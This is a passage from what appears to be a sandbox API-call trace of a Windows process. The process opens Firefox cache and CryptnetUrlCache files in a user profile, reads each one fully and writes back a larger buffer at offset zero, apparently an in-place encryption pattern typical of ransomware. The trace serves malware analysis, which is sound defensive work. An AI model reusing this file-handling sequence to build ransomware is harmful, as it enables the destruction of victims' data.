1 [0172.713] WriteFile (in: hFile=0x210, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0172.713] WriteFile (in: hFile=0x210, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0172.714] CloseHandle (hObject=0x210) returned 1 [0174.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.150] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.150] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe59f6 [0174.150] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.150] ReleaseMutex (hMutex=0x168) returned 1 [0174.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="startupCache.4.little", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="startupCache.4.little", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="startupCache.4.little", lpUsedDefaultChar=0x0) returned 21 [0174.151] ReadFile (in: hFile=0x210, lpBuffer=0x3d0baf8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.202] ReadFile (in: hFile=0x210, lpBuffer=0x3d0baf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0baf8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.229] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xe49f6 [0174.229] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.276] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xe49f6 [0174.276] WriteFile (in: hFile=0x210, lpBuffer=0x2885c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2885c48*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.276] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0174.276] WriteFile (in: hFile=0x210, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.276] WriteFile (in: hFile=0x210, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.277] CloseHandle (hObject=0x210) returned 1 [0174.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.278] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.278] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x561 [0174.278] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.278] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.278] ReleaseMutex (hMutex=0x168) returned 1 [0174.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpUsedDefaultChar=0x0) returned 65 [0174.278] ReadFile (in: hFile=0x210, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x561, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x359f2bc*=0x561, lpOverlapped=0x0) returned 1 [0174.296] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.296] WriteFile (in: hFile=0x210, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xae9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f2d0*=0xae9, lpOverlapped=0x0) returned 1 [0174.297] CloseHandle (hObject=0x210) returned 1 [0174.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.298] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.298] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x680 [0174.298] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.298] ReleaseMutex (hMutex=0x168) returned 1 [0174.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpUsedDefaultChar=0x0) returned 65 [0174.299] ReadFile (in: hFile=0x210, lpBuffer=0x288f968, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x680, lpOverlapped=0x0) returned 1 [0174.303] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.303] WriteFile (in: hFile=0x210, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xc08, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x359f2d0*=0xc08, lpOverlapped=0x0) returned 1 [0174.303] CloseHandle (hObject=0x210) returned 1 [0174.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.304] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.304] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1fa [0174.304] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.304] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.304] ReleaseMutex (hMutex=0x168) returned 1 [0174.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpUsedDefaultChar=0x0) returned 32 [0174.304] ReadFile (in: hFile=0x210, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1fa, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x359f2bc*=0x1fa, lpOverlapped=0x0) returned 1 [0174.305] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.306] WriteFile (in: hFile=0x210, lpBuffer=0x2891998*, nNumberOfBytesToWrite=0x782, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2891998*, lpNumberOfBytesWritten=0x359f2d0*=0x782, lpOverlapped=0x0) returned 1 [0174.306] CloseHandle (hObject=0x210) returned 1 [0174.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.307] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.307] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1cf [0174.307] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.307] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.307] ReleaseMutex (hMutex=0x168) returned 1 [0174.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpUsedDefaultChar=0x0) returned 65 [0174.307] ReadFile (in: hFile=0x210, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x359f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0174.308] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.308] WriteFile (in: hFile=0x210, lpBuffer=0x2891998*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2891998*, lpNumberOfBytesWritten=0x359f2d0*=0x757, lpOverlapped=0x0) returned 1 [0174.308] CloseHandle (hObject=0x210) returned 1 [0174.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.309] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.309] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e3 [0174.309] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.309] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.309] ReleaseMutex (hMutex=0x168) returned 1 [0174.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpUsedDefaultChar=0x0) returned 65 [0174.309] ReadFile (in: hFile=0x210, lpBuffer=0x288f968, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x359f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0174.311] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.311] WriteFile (in: hFile=0x210, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x359f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0174.311] CloseHandle (hObject=0x210) returned 1 [0174.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.312] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.312] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5ee [0174.312] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.312] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.312] ReleaseMutex (hMutex=0x168) returned 1 [0174.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpUsedDefaultChar=0x0) returned 65 [0174.312] ReadFile (in: hFile=0x210, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x5ee, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x359f2bc*=0x5ee, lpOverlapped=0x0) returned 1 [0174.325] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.325] WriteFile (in: hFile=0x210, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb76, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f2d0*=0xb76, lpOverlapped=0x0) returned 1 [0174.325] CloseHandle (hObject=0x210) returned 1 [0174.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.326] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.326] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5ae [0174.326] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.326] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.326] ReleaseMutex (hMutex=0x168) returned 1 [0174.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cchWideChar=65, lpMultiByteStr=0x1fac9cc, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpUsedDefaultChar=0x0) returned 65 [0174.326] ReadFile (in: hFile=0x210, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5ae, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x359f2bc*=0x5ae, lpOverlapped=0x0) returned 1 [0174.328] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.328] WriteFile (in: hFile=0x210, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb36, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f2d0*=0xb36, lpOverlapped=0x0) returned 1 [0174.328] CloseHandle (hObject=0x210) returned 1 [0174.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.333] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.333] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x194 [0174.333] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.333] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.333] ReleaseMutex (hMutex=0x168) returned 1 [0174.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpUsedDefaultChar=0x0) returned 65 [0174.333] ReadFile (in: hFile=0x210, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, 